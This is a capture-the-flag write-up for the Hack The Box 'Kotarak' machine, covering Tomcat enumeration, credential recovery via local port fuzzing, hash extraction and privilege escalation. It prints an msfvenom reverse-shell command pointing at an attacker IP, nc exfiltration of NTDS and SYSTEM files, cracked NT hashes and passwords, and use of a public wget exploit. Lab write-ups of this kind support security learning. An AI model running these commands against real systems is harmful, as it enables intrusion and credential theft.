HTB Write-up Kotarak
nmap:
8009 enum:
8080 enum:
Apache Tomcat/8.5.5
dirsearch result:
index.jsp took me to the tomcat page:
Attempted logging in to host-manager butI ot this
s3cret?
tomcat -s3cret didn't work..lol
After running the full scan, I found port 60000 open
possibly LFI vuln?
it looks like you can enter any url to browse so I entered my own and served http server.
it worked.
if we see ueragent here we could exploit it but not this time.
Let's enter some values like file://etc/passwd
ok..
Now we can fuzz the local ports with wfuzz
got a bunch of 2Ls so let's modify our command
--hl=2 will omit the result with 2L
We can see some stuff coming back.
onport 888,found a file server
After URL encoding the last part of the request with burp, I was able to see the content
username: admin
password: 3@g01PdhB!
Now we are finally in the admin portal.
Make a war shell code with msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.14 LPORT=7777 -f war > shell.war
Got a initial shell back after deploy the war file and started a nc listner.
spawn the shell. python -c 'import pty;pty.spawn("/bin/bash")'
backups looks interesting
find . --> useful to find hidden files.
Started a listner on kali : nc -nvlp 443 > SYSTEM
nc 10.10.16.14 443 < 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin
did the same for other file.
Now we've got the two files on our machine.
What is the NTDS.dit File?
The NTDS.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. By extracting these hashes, it is possible to use tools such as Mimikatz to perform pass-the-hash attacks, or tools like Hashcat to crack these passwords. The extraction and cracking of these passwords can be performed offline, so they will be undetectable. Once an attacker has extracted these hashes, they are able to act as any user on the domain, including Domain Administrators.
Extracting Hashes and Domain Info From .dit
If you have the NTDS.dit file and the SYSTEM hive, you can simply use the secretsdump.py
from impacket to extract all the NT hashes, but before we begin we need to download the files locally so we can extract the database information. I’m going to create a simple python HTTP server to transfer the files from the remote victim machine to my local machine.
it took forever to download these files! I tried the nc methods but I couldn't see the progress so files kept corrupting
Output
Time to crack some hashes!
Since the box is not windows, we have to crack them. And we don't care about the ones with $
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
separate them before the fourth colon.
Used this site to crack them.
admin cracked:
f16tomcat!
atanas - Password123!
Let's try ssh into these.
couldn't get in...
tried using su - atanas with the other password and it worked.
it looks like ssh is not enabled for this account.
Priv Esc
in root folder, we ca actually read app.log and flag.txt
wget 1.16...
let's do searchsploit to see what we have.
exploit DB: https://www.exploit-db.com/exploits/40064
Pasted the wget.rc content in /dev/shm folder
you cannot run python server on 21 but the box has a program called authbind installed and it bypasses it
uploading wget exploit file to the victim (modified some parts)
used wget -r http://IP/exploit.py to transfer the file.
changed the http listening port to 0.0.0.0
in summary: we need to have python server & the ftp on the victims machine
and nc running on attacker's.
/root/hacked-via-wget
Last updated